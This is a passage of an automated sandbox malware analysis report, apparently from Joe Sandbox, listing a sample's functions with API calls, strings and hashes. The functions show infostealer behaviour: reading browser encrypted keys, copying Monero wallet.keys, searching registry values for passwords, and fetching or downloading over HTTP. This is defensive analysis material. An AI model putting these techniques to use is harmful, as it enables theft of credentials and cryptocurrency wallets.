                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: 8089373da1d109309ac464b43782113201f68bdf334f51c404a3d60280ad4ae9
                        • Instruction ID: 8f998dce4da23afa9cf0fd55116e9b6ffecf14657859f3f64281b34659a24484
                        • Opcode Fuzzy Hash: 8089373da1d109309ac464b43782113201f68bdf334f51c404a3d60280ad4ae9
                        • Instruction Fuzzy Hash: 91121072800108AADB19FFA0DC9AFDDBBB8AF54300F545169F54676191EF342B8ACF52
                        Function 00E352C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E26280: InternetOpenA.WININET(00E40DFE,00000001,00000000,00000000,00000000), ref: 00E262E1
                          • Part of subcall function 00E26280: StrCmpCA.SHLWAPI(?,0196FA58), ref: 00E26303
                          • Part of subcall function 00E26280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E26335
                          • Part of subcall function 00E26280: HttpOpenRequestA.WININET(00000000,GET,?,0196F4B0,00000000,00000000,00400100,00000000), ref: 00E26385
                          • Part of subcall function 00E26280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E263BF
                          • Part of subcall function 00E26280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E263D1
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E35318
                        • lstrlen.KERNEL32(00000000), ref: 00E3532F
                          • Part of subcall function 00E38E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E38E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00E35364
                        • lstrlen.KERNEL32(00000000), ref: 00E35383
                        • lstrlen.KERNEL32(00000000), ref: 00E353AE
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: 487a9335989a81d59f42ded580947c71d66f16eccec0ba3326fcb45dd9185a9b
                        • Instruction ID: 6414a75891acce2eb2daf85b801abdd17bd2655a95d40993259b63ab80fc15cf
                        • Opcode Fuzzy Hash: 487a9335989a81d59f42ded580947c71d66f16eccec0ba3326fcb45dd9185a9b
                        • Instruction Fuzzy Hash: BC511F31910148ABCB18FF60DD9EAED7BB9AF10300F545068F4467B591EF346B85CB62
                        Function 00E312D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 989c655f4f2cd38d34133d4a8c332ef7f702c9217aef11c0a29edc6a18074d5e
                        • Instruction ID: 79633d3ab95af133e20e9d0b9aeda3ccca91cc6bc16b6a1f911b42fbef464e0b
                        • Opcode Fuzzy Hash: 989c655f4f2cd38d34133d4a8c332ef7f702c9217aef11c0a29edc6a18074d5e
                        • Instruction Fuzzy Hash: 17C1B5B69002199BCB14EF60DC8DFEA77B8BB64304F1445E8F10AB7141DB75AA85CFA1
                        Function 00E34280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E38DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E38E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00E342EC
                        • lstrcat.KERNEL32(?,0196F1F8), ref: 00E3430B
                        • lstrcat.KERNEL32(?,?), ref: 00E3431F
                        • lstrcat.KERNEL32(?,0196DEF0), ref: 00E34333
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E38D90: GetFileAttributesA.KERNEL32(00000000,?,00E21B54,?,?,00E4564C,?,?,00E40E1F), ref: 00E38D9F
                          • Part of subcall function 00E29CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E29D39
                          • Part of subcall function 00E299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E299EC
                          • Part of subcall function 00E299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E29A11
                          • Part of subcall function 00E299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E29A31
                          • Part of subcall function 00E299C0: ReadFile.KERNEL32(000000FF,?,00000000,00E2148F,00000000), ref: 00E29A5A
                          • Part of subcall function 00E299C0: LocalFree.KERNEL32(00E2148F), ref: 00E29A90
                          • Part of subcall function 00E299C0: CloseHandle.KERNEL32(000000FF), ref: 00E29A9A
                          • Part of subcall function 00E393C0: GlobalAlloc.KERNEL32(00000000,00E343DD,00E343DD), ref: 00E393D3
                        • StrStrA.SHLWAPI(?,0196F2E8), ref: 00E343F3
                        • GlobalFree.KERNEL32(?), ref: 00E34512
                          • Part of subcall function 00E29AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E29AEF
                          • Part of subcall function 00E29AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00E24EEE,00000000,?), ref: 00E29B01
                          • Part of subcall function 00E29AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E29B2A
                          • Part of subcall function 00E29AC0: LocalFree.KERNEL32(?,?,?,?,00E24EEE,00000000,?), ref: 00E29B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 00E344A3
                        • StrCmpCA.SHLWAPI(?,00E408D1), ref: 00E344C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00E344D2
                        • lstrcat.KERNEL32(00000000,?), ref: 00E344E5
                        • lstrcat.KERNEL32(00000000,00E40FB8), ref: 00E344F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 3541710228-0
                        • Opcode ID: 59c4d301f87111085b706c2675a6321e3614cd15b14f5e08173a269324f5697a
                        • Instruction ID: 63e78226775bcc3eab215a715773e1f05085c3a84c515c5b3ffaba159b233d99
                        • Opcode Fuzzy Hash: 59c4d301f87111085b706c2675a6321e3614cd15b14f5e08173a269324f5697a
                        • Instruction Fuzzy Hash: BB7148B6900218BBCB14FBA0DC89FEE77B9AF88300F045598F645B7185DA35EB45CB91
                        Function 00E21310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E212A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E212B4
                          • Part of subcall function 00E212A0: RtlAllocateHeap.NTDLL(00000000), ref: 00E212BB
                          • Part of subcall function 00E212A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E212D7
                          • Part of subcall function 00E212A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E212F5
                          • Part of subcall function 00E212A0: RegCloseKey.ADVAPI32(?), ref: 00E212FF
                        • lstrcat.KERNEL32(?,00000000), ref: 00E2134F
                        • lstrlen.KERNEL32(?), ref: 00E2135C
                        • lstrcat.KERNEL32(?,.keys), ref: 00E21377
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E38B60: GetSystemTime.KERNEL32(00E40E1A,0196E990,00E405AE,?,?,00E213F9,?,0000001A,00E40E1A,00000000,?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E38B86
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00E21465
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E299EC
                          • Part of subcall function 00E299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E29A11
                          • Part of subcall function 00E299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E29A31
                          • Part of subcall function 00E299C0: ReadFile.KERNEL32(000000FF,?,00000000,00E2148F,00000000), ref: 00E29A5A
                          • Part of subcall function 00E299C0: LocalFree.KERNEL32(00E2148F), ref: 00E29A90
                          • Part of subcall function 00E299C0: CloseHandle.KERNEL32(000000FF), ref: 00E29A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 00E214EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: 463109eb9f1ed82b177999000ce644a10146f47467c9b116d1b8bb998067fbdd
                        • Instruction ID: 709eb753a55e3a90a2d45b1b1ddee8c05e773f8f374d61653daa9ecd852089be
                        • Opcode Fuzzy Hash: 463109eb9f1ed82b177999000ce644a10146f47467c9b116d1b8bb998067fbdd
                        • Instruction Fuzzy Hash: 795175B2D5011897CB15FB60DC9AFED77BCAF54300F4451E8B24A72082EE346B89CBA5
                        Function 00E275D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E272D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E2733A
                          • Part of subcall function 00E272D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E273B1
                          • Part of subcall function 00E272D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E2740D
                          • Part of subcall function 00E272D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00E27452
                          • Part of subcall function 00E272D0: HeapFree.KERNEL32(00000000), ref: 00E27459
                        • lstrcat.KERNEL32(00000000,00E417FC), ref: 00E27606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00E27648
                        • lstrcat.KERNEL32(00000000, : ), ref: 00E2765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00E2768F
                        • lstrcat.KERNEL32(00000000,00E41804), ref: 00E276A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00E276D3
                        • lstrcat.KERNEL32(00000000,00E41808), ref: 00E276ED
                        • task.LIBCPMTD ref: 00E276FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                        • String ID: :
                        • API String ID: 2677904052-3653984579
                        • Opcode ID: 7e96a68bfdb1d009938b77c803abe47c1b0c970aa2ab01baa1fb731e8fc50f5b
                        • Instruction ID: 3e14d21b22992c58781a98256db6c18f1a9a03909db4b9db257fb5f6d13b7c86
                        • Opcode Fuzzy Hash: 7e96a68bfdb1d009938b77c803abe47c1b0c970aa2ab01baa1fb731e8fc50f5b
                        • Instruction Fuzzy Hash: BD313E72A01109DFCB18FBA4ED99DFE77B4BB48301B206118F142B72A5DA39A946CB51
                        Function 00E38100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0196F7B0,00000000,?,00E40E2C,00000000,?,00000000), ref: 00E38130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E38137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00E38158
                        • __aulldiv.LIBCMT ref: 00E38172
                        • __aulldiv.LIBCMT ref: 00E38180
                        • wsprintfA.USER32 ref: 00E381AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2774356765-3474575989
                        • Opcode ID: 83042ee46a4f407742f14478c4517ff824e3a9cad3a04dd6ad551acdd085153d
                        • Instruction ID: e21e54162f19995b45a6ff125db45cc1c8f03e864afe0cdee8716e0c00036409
                        • Opcode Fuzzy Hash: 83042ee46a4f407742f14478c4517ff824e3a9cad3a04dd6ad551acdd085153d
                        • Instruction Fuzzy Hash: AF21F7B1E44318ABDB10DFD4DD49FAEBBB8EB44B10F104619F605BB280D7796901CBA5
                        Function 00E260A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E24839
                          • Part of subcall function 00E247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E24849
                        • InternetOpenA.WININET(00E40DF7,00000001,00000000,00000000,00000000), ref: 00E2610F
                        • StrCmpCA.SHLWAPI(?,0196FA58), ref: 00E26147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00E2618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E261B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00E261DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E2620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00E26249
                        • InternetCloseHandle.WININET(?), ref: 00E26253
                        • InternetCloseHandle.WININET(00000000), ref: 00E26260
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 2507841554-0
                        • Opcode ID: 6480ddb0dba904231dfbd399a9bd6f8a283945fb4ba77c7fcbd35d779400da8e
                        • Instruction ID: eb4f02679eccaa758f8c811b2348346042ac50b7e007e2cf6de9b06cd648a268
                        • Opcode Fuzzy Hash: 6480ddb0dba904231dfbd399a9bd6f8a283945fb4ba77c7fcbd35d779400da8e
                        • Instruction Fuzzy Hash: 4C517EB1A00218EBDB20DF50EC49BEE77B8FB44305F1091A8F646B7190DB796A85CF95
                        Function 00E272D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E2733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E273B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E2740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00E27452
                        • HeapFree.KERNEL32(00000000), ref: 00E27459
                        • task.LIBCPMTD ref: 00E27555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
